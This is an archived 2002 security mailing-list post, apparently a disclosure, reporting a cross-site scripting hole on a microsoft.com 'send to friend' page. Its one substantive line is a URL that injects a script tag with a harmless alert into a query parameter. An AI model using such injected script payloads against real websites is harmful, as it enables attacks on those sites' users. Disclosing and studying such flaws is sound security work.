Cross Site Scripting in microsoft.com

From: frog frog (leseulfrogat_private)
Date: Sun Jan 06 2002 - 08:26:23 PST

Next message: oPr: "Re: Possible hole in xchat"

Previous message: frog frog: "CSS in PHPNuke add-on"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) The hole is here : http://www.microsoft.com/freedomtoinnovate/inc/send friend.asp?sAddress="><script>alert('Microsoft% 20hole')</script> frog

Next message: oPr: "Re: Possible hole in xchat"
Previous message: frog frog: "CSS in PHPNuke add-on"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jan 06 2002 - 09:48:27 PST